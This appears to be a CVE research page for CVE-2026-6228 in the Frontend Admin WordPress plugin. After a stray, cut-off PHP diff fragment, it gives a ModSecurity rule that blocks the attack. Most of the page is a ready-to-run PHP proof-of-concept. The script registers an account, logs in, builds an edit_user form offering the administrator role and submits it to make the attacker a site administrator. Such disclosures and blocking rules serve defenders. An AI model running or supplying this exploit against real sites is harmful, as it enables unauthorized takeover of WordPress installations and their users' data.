+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.5
+		 *
+		 * @return bool
+		 */
+		abstract functio

SecRule REQUEST_URI "@streq /wp-admin/post.php" "id:20262280,phase:2,deny,status:403,chain,msg:'CVE-2026-6228 - Frontend Admin Privilege Escalation',severity:'CRITICAL',tag:'CVE-2026-6228',tag:'wordpress',tag:'frontend-admin'"
SecRule ARGS_POST:post_type "@streq admin_form" "chain"
SecRule ARGS_POST:fea_form_type "@streq edit_user" "chain"
SecRule ARGS_POST:fea_role_options "@streq administrator" ""

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6228 - Frontend Admin by DynamiApps <= 3.28.36 - Unauthenticated Privilege Escalation via Edit User Form

<?php

// Configuration - change these values for your target
$target_url = 'http://example.com'; // WordPress site URL without trailing slash
$admin_username = 'attacker_admin';   // Username for new admin account
$admin_email = 'attacker@example.com'; // Email for new admin account
$admin_password = 'Password123!';      // Password for new admin account

// First, register a new user via the public form (assuming the plugin provides a new_user form)
echo "[+] Step 1: Registering new user via public registration...n";
$registration_data = array(
    'action' => 'fea_form_submit',
    'fea_form_type' => 'new_user',
    'fea_user_username' => $admin_username,
    'fea_user_email' => $admin_email,
    'fea_user_password' => $admin_password,
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($registration_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Registration response: $responsen";

// Wait for WordPress to process and log in the new user
echo "[+] Step 2: Logging in as newly registered user...n";

$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Login completed (may need to manually verify cookie storage)n";

// Now create an edit_user form with 'administrator' in the role_options array
echo "[+] Step 3: Creating edit_user form with administrator role option...n";

$form_post_data = array(
    'action' => 'editpost',
    'post_type' => 'admin_form',
    'post_title' => 'Privilege Escalation Form',
    'fea_form_type' => 'edit_user',
    'fea_role_options' => array('subscriber', 'contributor', 'author', 'editor', 'administrator'),
    'post_status' => 'publish'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($form_post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Form creation response: $responsen";

// Submit the edit_user form to change the attacker's role to administrator
echo "[+] Step 4: Submitting edit_user form to escalate privileges...n";

$submit_data = array(
    'action' => 'fea_form_submit',
    'fea_form_type' => 'edit_user',
    'fea_user_role' => 'administrator',
    'fea_user_id' => 0 // Editing own user
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($submit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Privilege escalation response: $responsen";
echo "[+] Exploit complete. Check if user $admin_username now has admin role.n";

?>